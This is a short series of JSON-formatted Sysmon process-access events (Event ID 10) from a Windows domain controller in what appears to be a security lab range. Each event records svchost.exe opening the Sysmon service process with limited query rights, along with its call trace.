{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1482,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1483,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1484,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
